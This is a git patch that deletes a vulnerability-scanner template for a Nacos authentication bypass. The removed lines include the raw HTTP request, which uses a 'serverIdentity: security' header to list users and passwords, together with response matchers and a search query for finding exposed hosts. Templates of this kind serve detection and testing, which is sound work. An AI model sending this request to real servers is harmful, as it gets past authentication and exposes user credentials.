From 4302231285c68e38da012a9e9fa0ea9e24529ae1 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 22 Aug 2023 13:25:06 +0530
Subject: [PATCH] Delete nacos-auth-bypass.yaml
---
.../other/nacos-auth-bypass.yaml | 42 -------------------
1 file changed, 42 deletions(-)
delete mode 100644 http/vulnerabilities/other/nacos-auth-bypass.yaml
diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml
deleted file mode 100644
index 596e0fd678..0000000000
--- a/http/vulnerabilities/other/nacos-auth-bypass.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: nacos-auth-bypass - -info: - name: Nacos - Authentication Bypass - author: SleepingBag945 - severity: high - description: | - When analyzing the authentication verification process of Nacos, it is found that there are various default authentication methods. By default, various methods can be used to bypass authorization authentication. - reference: - - https://zhuanlan.zhihu.com/p/602021283 - metadata: - max-request: 1 - verified: true - fofa-query: app="NACOS" - tags: nacos,auth-bypass - -http: - - raw: - - | - GET /v1/auth/users?pageNo=1&pageSize=9&search=blur HTTP/1.1 - Host: {{Hostname}} - serverIdentity: security - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"totalCount":' - - '"username":' - - '"password":' - - '"pagesAvailable":' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200